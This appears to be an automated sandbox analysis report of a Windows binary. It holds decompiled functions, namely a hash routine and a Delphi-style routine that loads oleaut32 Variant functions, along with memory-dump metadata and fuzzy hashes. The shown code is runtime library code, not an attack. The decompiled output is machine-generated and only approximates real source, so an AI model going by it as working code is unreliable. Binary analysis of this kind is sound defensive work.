                                                                                    0x00425a61
                                                                                    0x00425a61
                                                                                    0x00425a61
                                                                                    0x00425a6d
                                                                                    0x00000000
                                                                                    0x00425a6d
                                                                                    0x0042597d
                                                                                    0x0042597f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425985
                                                                                    0x00425989
                                                                                    0x00425995
                                                                                    0x00425998
                                                                                    0x004259a1
                                                                                    0x0042599a
                                                                                    0x0042599a
                                                                                    0x0042599a
                                                                                    0x004259a6
                                                                                    0x004259aa
                                                                                    0x004259ac
                                                                                    0x004259af
                                                                                    0x004259b1
                                                                                    0x004259b1
                                                                                    0x004259b1
                                                                                    0x004259ba
                                                                                    0x004259c3
                                                                                    0x004259c6
                                                                                    0x004259c7
                                                                                    0x004259ca
                                                                                    0x004259cc
                                                                                    0x004259cc
                                                                                    0x004259cc
                                                                                    0x004259d4
                                                                                    0x004259d6
                                                                                    0x004259dc
                                                                                    0x004259df
                                                                                    0x004259e5
                                                                                    0x004259e5
                                                                                    0x00000000
                                                                                    0x004259df
                                                                                    0x00000000
                                                                                    0x0042598b
                                                                                    0x00425888
                                                                                    0x0042588d
                                                                                    0x00425890
                                                                                    0x004258d1
                                                                                    0x00425892
                                                                                    0x00425896
                                                                                    0x0042589c
                                                                                    0x0042589f
                                                                                    0x004258a4
                                                                                    0x004258a4
                                                                                    0x004258a4
                                                                                    0x004258a4
                                                                                    0x004258b0
                                                                                    0x004258c1
                                                                                    0x004258c1
                                                                                    0x004258da
                                                                                    0x004258dc
                                                                                    0x004258df
                                                                                    0x004258e5
                                                                                    0x004258e8
                                                                                    0x004258ea
                                                                                    0x004258ea
                                                                                    0x004258ea
                                                                                    0x004258ea
                                                                                    0x004258f3
                                                                                    0x004258f6
                                                                                    0x004258f7
                                                                                    0x004258fa
                                                                                    0x004258fc
                                                                                    0x004258fc
                                                                                    0x004258fc
                                                                                    0x004258fe
                                                                                    0x00425901
                                                                                    0x0042590a
                                                                                    0x0042590d
                                                                                    0x00425917
                                                                                    0x0042590f
                                                                                    0x0042590f
                                                                                    0x0042590f
                                                                                    0x00425903
                                                                                    0x00425903
                                                                                    0x00425903
                                                                                    0x00000000
                                                                                    0x00425901
                                                                                    0x00000000
                                                                                    0x00425830
                                                                                    0x00000000
                                                                                    0x00425822
                                                                                    0x00425be8
                                                                                    0x00425bee
                                                                                    0x00425bf7
                                                                                    0x00425bfd
                                                                                    0x00425c09
                                                                                    0x00425c12
                                                                                    0x00425c18
                                                                                    0x00425c21
                                                                                    0x00425c2a
                                                                                    0x00425c33
                                                                                    0x00425c39
                                                                                    0x00425c42
                                                                                    0x00425c4b
                                                                                    0x00425c57
                                                                                    0x00425c60
                                                                                    0x00425c69
                                                                                    0x00425c6b
                                                                                    0x00000000
                                                                                    0x00425c6b
                                                                                    0x00425701
                                                                                    0x00425704
                                                                                    0x0042570c
                                                                                    0x00425712
                                                                                    0x00425715
                                                                                    0x0042572e
                                                                                    0x00425735
                                                                                    0x00425738
                                                                                    0x0042573b
                                                                                    0x0042573e
                                                                                    0x00425740
                                                                                    0x00425745
                                                                                    0x00425748
                                                                                    0x00425750
                                                                                    0x00425752
                                                                                    0x0042575d
                                                                                    0x00425762
                                                                                    0x00425766
                                                                                    0x00000000
                                                                                    0x00425768
                                                                                    0x00425770
                                                                                    0x00425774
                                                                                    0x00425780
                                                                                    0x00425782
                                                                                    0x00000000
                                                                                    0x00425776
                                                                                    0x00000000
                                                                                    0x00425776
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00425717
                                                                                    0x00425717
                                                                                    0x0042571a
                                                                                    0x0042571f
                                                                                    0x00425722
                                                                                    0x00425729
                                                                                    0x00425729
                                                                                    0x00000000

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                    • Instruction ID: 61b87226b6134f121ca287378b5d435c32ef56f555bf4f4916e7d2b2d6d49e77
                                                                                    • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                                    • Instruction Fuzzy Hash: E932E274E00629DFCB14CF99D981AEDBBB2BF88314F64816AD815AB341D734AE42CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004323DC(signed int* __eax, intOrPtr __ecx, signed int __edx) {
                                                                                    				signed int* _v8;
                                                                                    				signed int* _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v20;
                                                                                    				char _v24;
                                                                                    				char _v28;
                                                                                    				unsigned int* _t96;
                                                                                    				unsigned int* _t106;
                                                                                    				signed int* _t108;
                                                                                    				signed int _t109;
                                                                                    
                                                                                    				_t109 = __edx;
                                                                                    				_v16 = __ecx;
                                                                                    				_v12 = __eax;
                                                                                    				_t106 =  &_v24;
                                                                                    				_t108 =  &_v28;
                                                                                    				_t96 =  &_v20;
                                                                                    				 *_t96 = __edx + 0xdeadbeef + _v16;
                                                                                    				 *_t106 =  *_t96;
                                                                                    				 *_t108 =  *_t96;
                                                                                    				_v8 = _v12;
                                                                                    				if((_v8 & 0x00000003) != 0) {
                                                                                    					if(__edx <= 0xc) {
                                                                                    						L20:
                                                                                    						if(_t109 > 0xc) {
                                                                                    							L23:
                                                                                    							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x18);
                                                                                    							L24:
                                                                                    							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 0x10);
                                                                                    							L25:
                                                                                    							 *_t108 =  *_t108 + ((_v8[2] & 0x000000ff) << 8);
                                                                                    							L26:
                                                                                    							 *_t108 =  *_t108 + (_v8[2] & 0x000000ff);
                                                                                    							L27:
                                                                                    							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x18);
                                                                                    							L28:
                                                                                    							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 0x10);
                                                                                    							L29:
                                                                                    							 *_t106 =  *_t106 + ((_v8[1] & 0x000000ff) << 8);
                                                                                    							L30:
                                                                                    							 *_t106 =  *_t106 + (_v8[1] & 0x000000ff);
                                                                                    							L31:
                                                                                    							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x18);
                                                                                    							L32:
                                                                                    							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 0x10);
                                                                                    							L33:
                                                                                    							 *_t96 =  *_t96 + ((_v8[0] & 0x000000ff) << 8);
                                                                                    							L34:
                                                                                    							 *_t96 =  *_t96 + ( *_v8 & 0x000000ff);
                                                                                    							L35:
                                                                                    							 *_t108 =  *_t108 ^  *_t106;
                                                                                    							 *_t108 =  *_t108 - ( *_t106 << 0x0000000e |  *_t106 >> 0x00000012);
                                                                                    							 *_t96 =  *_t96 ^  *_t108;
                                                                                    							 *_t96 =  *_t96 - ( *_t108 << 0x0000000b |  *_t108 >> 0x00000015);
                                                                                    							 *_t106 =  *_t106 ^  *_t96;
                                                                                    							 *_t106 =  *_t106 - ( *_t96 << 0x00000019 |  *_t96 >> 0x00000007);
                                                                                    							 *_t108 =  *_t108 ^  *_t106;
                                                                                    							 *_t108 =  *_t108 - ( *_t106 << 0x00000010 |  *_t106 >> 0x00000010);
                                                                                    							 *_t96 =  *_t96 ^  *_t108;
                                                                                    							 *_t96 =  *_t96 - ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                                                    							 *_t106 =  *_t106 ^  *_t96;
                                                                                    							 *_t106 =  *_t106 - ( *_t96 << 0x0000000e |  *_t96 >> 0x00000012);
                                                                                    							 *_t108 =  *_t108 ^  *_t106;
                                                                                    							 *_t108 =  *_t108 - ( *_t106 << 0x00000018 |  *_t106 >> 0x00000008);
                                                                                    							return  *_t108;
                                                                                    						}
                                                                                    						switch( *((intOrPtr*)(_t109 * 4 +  &M00432749))) {
                                                                                    							case 0:
                                                                                    								return  *_t108;
                                                                                    							case 1:
                                                                                    								goto L34;
                                                                                    							case 2:
                                                                                    								goto L33;
                                                                                    							case 3:
                                                                                    								goto L32;
                                                                                    							case 4:
                                                                                    								goto L31;
                                                                                    							case 5:
                                                                                    								goto L30;
                                                                                    							case 6:
                                                                                    								goto L29;
                                                                                    							case 7:
                                                                                    								goto L28;
                                                                                    							case 8:
                                                                                    								goto L27;
                                                                                    							case 9:
                                                                                    								goto L26;
                                                                                    							case 0xa:
                                                                                    								goto L25;
                                                                                    							case 0xb:
                                                                                    								goto L24;
                                                                                    							case 0xc:
                                                                                    								goto L23;
                                                                                    						}
                                                                                    					} else {
                                                                                    						goto L19;
                                                                                    					}
                                                                                    					do {
                                                                                    						L19:
                                                                                    						 *_t96 =  *_t96 + ( *_v8 & 0x000000ff) + ((_v8[0] & 0x000000ff) << 8) + ((_v8[0] & 0x000000ff) << 0x10) + ((_v8[0] & 0x000000ff) << 0x18);
                                                                                    						 *_t106 =  *_t106 + (_v8[1] & 0x000000ff) + ((_v8[1] & 0x000000ff) << 8) + ((_v8[1] & 0x000000ff) << 0x10) + ((_v8[1] & 0x000000ff) << 0x18);
                                                                                    						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
                                                                                    						 *_t96 =  *_t96 -  *_t108;
                                                                                    						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                                                    						 *_t108 =  *_t108 +  *_t106;
                                                                                    						 *_t106 =  *_t106 -  *_t96;
                                                                                    						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
                                                                                    						 *_t96 =  *_t96 +  *_t108;
                                                                                    						 *_t108 =  *_t108 -  *_t106;
                                                                                    						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
                                                                                    						 *_t106 =  *_t106 +  *_t96;
                                                                                    						 *_t96 =  *_t96 -  *_t108;
                                                                                    						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
                                                                                    						 *_t108 =  *_t108 +  *_t106;
                                                                                    						 *_t106 =  *_t106 -  *_t96;
                                                                                    						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
                                                                                    						 *_t96 =  *_t96 +  *_t108;
                                                                                    						 *_t108 =  *_t108 -  *_t106;
                                                                                    						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
                                                                                    						 *_t106 =  *_t106 +  *_t96;
                                                                                    						_t109 = _t109 - 0xc;
                                                                                    						_v8 =  &(_v8[3]);
                                                                                    					} while (_t109 > 0xc);
                                                                                    					goto L20;
                                                                                    				}
                                                                                    				if(__edx <= 0xc) {
                                                                                    					L3:
                                                                                    					if(_t109 > 0xc) {
                                                                                    						goto L35;
                                                                                    					}
                                                                                    					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
                                                                                    						case 0:
                                                                                    							return  *_t108;
                                                                                    						case 1:
                                                                                    							_v8 =  *_v8;
                                                                                    							__edx =  *_v8 & 0x000000ff;
                                                                                    							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
                                                                                    							goto L35;
                                                                                    						case 2:
                                                                                    							_v8 =  *_v8;
                                                                                    							__edx =  *_v8 & 0x0000ffff;
                                                                                    							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
                                                                                    							goto L35;
                                                                                    						case 3:
                                                                                    							_v8 =  *_v8;
                                                                                    							__edx =  *_v8 & 0x00ffffff;
                                                                                    							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
                                                                                    							goto L35;
                                                                                    						case 4:
                                                                                    							_v8 =  *_v8;
                                                                                    							 *__eax =  *__eax +  *_v8;
                                                                                    							goto L35;
                                                                                    						case 5:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							__edx =  *(__edx + 4);
                                                                                    							 *__ebx =  *__ebx + __edx;
                                                                                    							goto L35;
                                                                                    						case 6:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							__edx =  *(__edx + 4);
                                                                                    							 *__ebx =  *__ebx + __edx;
                                                                                    							goto L35;
                                                                                    						case 7:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							__edx =  *(__edx + 4);
                                                                                    							 *__ebx =  *__ebx + __edx;
                                                                                    							goto L35;
                                                                                    						case 8:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							 *__ebx =  *__ebx + __edx;
                                                                                    							goto L35;
                                                                                    						case 9:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                    							__edx =  *(__edx + 8);
                                                                                    							 *__ecx =  *__ecx + __edx;
                                                                                    							goto L35;
                                                                                    						case 0xa:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                    							__edx =  *(__edx + 8);
                                                                                    							 *__ecx =  *__ecx + __edx;
                                                                                    							goto L35;
                                                                                    						case 0xb:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                    							__edx =  *(__edx + 8);
                                                                                    							 *__ecx =  *__ecx + __edx;
                                                                                    							goto L35;
                                                                                    						case 0xc:
                                                                                    							__edx = _v8;
                                                                                    							 *__eax =  *__eax +  *__edx;
                                                                                    							 *__ebx =  *__ebx +  *(__edx + 4);
                                                                                    							 *__ecx =  *__ecx + __edx;
                                                                                    							goto L35;
                                                                                    					}
                                                                                    				} else {
                                                                                    					goto L2;
                                                                                    				}
                                                                                    				do {
                                                                                    					L2:
                                                                                    					 *_t96 =  *_t96 +  *_v8;
                                                                                    					 *_t106 =  *_t106 + _v8[1];
                                                                                    					 *_t108 =  *_t108 + _v8[2];
                                                                                    					 *_t96 =  *_t96 -  *_t108;
                                                                                    					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                                                    					 *_t108 =  *_t108 +  *_t106;
                                                                                    					 *_t106 =  *_t106 -  *_t96;
                                                                                    					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
                                                                                    					 *_t96 =  *_t96 +  *_t108;
                                                                                    					 *_t108 =  *_t108 -  *_t106;
                                                                                    					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
                                                                                    					 *_t106 =  *_t106 +  *_t96;
                                                                                    					 *_t96 =  *_t96 -  *_t108;
                                                                                    					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
                                                                                    					 *_t108 =  *_t108 +  *_t106;
                                                                                    					 *_t106 =  *_t106 -  *_t96;
                                                                                    					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
                                                                                    					 *_t96 =  *_t96 +  *_t108;
                                                                                    					 *_t108 =  *_t108 -  *_t106;
                                                                                    					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
                                                                                    					 *_t106 =  *_t106 +  *_t96;
                                                                                    					_t109 = _t109 - 0xc;
                                                                                    					_v8 = _v8 + 0xc;
                                                                                    				} while (_t109 > 0xc);
                                                                                    				goto L3;
                                                                                    			}

                                                                                    0x004323dc
                                                                                    0x004323e5
                                                                                    0x004323e8
                                                                                    0x004323eb
                                                                                    0x004323ee
                                                                                    0x004323f1
                                                                                    0x004323ff
                                                                                    0x00432403
                                                                                    0x00432407
                                                                                    0x0043240c
                                                                                    0x00432413
                                                                                    0x0043261d
                                                                                    0x0043273d
                                                                                    0x00432740
                                                                                    0x00432784
                                                                                    0x0043278e
                                                                                    0x00432790
                                                                                    0x0043279a
                                                                                    0x0043279c
                                                                                    0x004327a6
                                                                                    0x004327a8
                                                                                    0x004327af
                                                                                    0x004327b1
                                                                                    0x004327bb
                                                                                    0x004327bd
                                                                                    0x004327c7
                                                                                    0x004327c9
                                                                                    0x004327d3
                                                                                    0x004327d5
                                                                                    0x004327dc
                                                                                    0x004327de
                                                                                    0x004327e8
                                                                                    0x004327ea
                                                                                    0x004327f4
                                                                                    0x004327f6
                                                                                    0x00432800
                                                                                    0x00432802
                                                                                    0x00432808
                                                                                    0x0043280a
                                                                                    0x0043280c
                                                                                    0x0043281a
                                                                                    0x0043281e
                                                                                    0x0043282c
                                                                                    0x00432830
                                                                                    0x0043283e
                                                                                    0x00432842
                                                                                    0x00432850
                                                                                    0x00432854
                                                                                    0x00432862
                                                                                    0x00432866
                                                                                    0x00432874
                                                                                    0x00432878
                                                                                    0x00432886
                                                                                    0x00000000
                                                                                    0x00432888
                                                                                    0x00432742
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00432623
                                                                                    0x00432623
                                                                                    0x0043264d
                                                                                    0x0043267a
                                                                                    0x004326a7
                                                                                    0x004326ab
                                                                                    0x004326b9
                                                                                    0x004326bd
                                                                                    0x004326c1
                                                                                    0x004326cf
                                                                                    0x004326d3
                                                                                    0x004326d7
                                                                                    0x004326e5
                                                                                    0x004326e9
                                                                                    0x004326ed
                                                                                    0x004326fb
                                                                                    0x004326ff
                                                                                    0x00432703
                                                                                    0x00432711
                                                                                    0x00432715
                                                                                    0x00432719
                                                                                    0x00432727
                                                                                    0x0043272b
                                                                                    0x0043272d
                                                                                    0x00432730
                                                                                    0x00432734
                                                                                    0x00000000
                                                                                    0x00432623
                                                                                    0x0043241c
                                                                                    0x004324cd
                                                                                    0x004324d0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004324d6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043251b
                                                                                    0x0043251d
                                                                                    0x00432523
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043252d
                                                                                    0x0043252f
                                                                                    0x00432535
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0043253f
                                                                                    0x00432541

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                    • Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
                                                                                    • Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                                                    • Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                    • Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
                                                                                    • Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                                                    • Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                    • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                                                    • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                                                    • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00427874() {
                                                                                    				struct HINSTANCE__* _v8;
                                                                                    				intOrPtr _t46;
                                                                                    				void* _t91;
                                                                                    
                                                                                    				_v8 = GetModuleHandleW(L"oleaut32.dll");
                                                                                    				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
                                                                                    				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
                                                                                    				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
                                                                                    				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
                                                                                    				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
                                                                                    				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
                                                                                    				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
                                                                                    				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
                                                                                    				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
                                                                                    				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
                                                                                    				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
                                                                                    				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
                                                                                    				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
                                                                                    				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
                                                                                    				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
                                                                                    				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
                                                                                    				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
                                                                                    				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
                                                                                    				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
                                                                                    				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
                                                                                    				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
                                                                                    				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
                                                                                    				 *0x4c1188 = _t46;
                                                                                    				return _t46;
                                                                                    			}


                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                                                      • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressHandleModuleProc
                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                    • API String ID: 1646373207-1918263038
                                                                                    • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                    • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                                                    • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                                                    • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 82%
                                                                                    			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
                                                                                    				signed int _v8;
                                                                                    				char _v12;
                                                                                    				signed int _v16;
                                                                                    				intOrPtr _v20;
                                                                                    				intOrPtr* _t32;
                                                                                    				signed int _t53;
                                                                                    				signed int _t56;
                                                                                    				signed int _t71;
                                                                                    				signed int _t78;
                                                                                    				signed int* _t82;
                                                                                    				signed int _t85;
                                                                                    				void* _t93;
                                                                                    				signed int _t94;
                                                                                    				signed int _t95;
                                                                                    				signed int _t98;
                                                                                    				signed int _t99;
                                                                                    				void* _t105;
                                                                                    				intOrPtr _t106;
                                                                                    				signed int _t109;
                                                                                    				intOrPtr _t116;
                                                                                    				intOrPtr _t117;
                                                                                    				void* _t131;
                                                                                    				void* _t132;
                                                                                    				signed int _t134;
                                                                                    				void* _t136;
                                                                                    				void* _t137;
                                                                                    				void* _t139;
                                                                                    				void* _t140;
                                                                                    				intOrPtr _t141;
                                                                                    				void* _t142;
                                                                                    				long long _t161;
                                                                                    
                                                                                    				_t161 = __fp0;
                                                                                    				_t126 = __edi;
                                                                                    				_t109 = __edx;
                                                                                    				_t139 = _t140;
                                                                                    				_t141 = _t140 + 0xfffffff0;
                                                                                    				_push(__edi);
                                                                                    				_v12 = 0;
                                                                                    				_v8 = __edx;
                                                                                    				_t93 = __eax;
                                                                                    				_push(_t139);
                                                                                    				_push(0x41ea61);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t141;
                                                                                    				_t32 =  *0x4ba590; // 0x4bb8f8
                                                                                    				_t144 =  *_t32;
                                                                                    				if( *_t32 == 0) {
                                                                                    					E0040554C(0x1a);
                                                                                    				}
                                                                                    				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
                                                                                    				_push(_t139);
                                                                                    				_push(0x41ea44);
                                                                                    				_push( *[fs:edx]);
                                                                                    				 *[fs:edx] = _t141;
                                                                                    				 *0x4be7dc = 0;
                                                                                    				_push(0);
                                                                                    				E00409C00();
                                                                                    				_t142 = _t141 + 4;
                                                                                    				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
                                                                                    				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
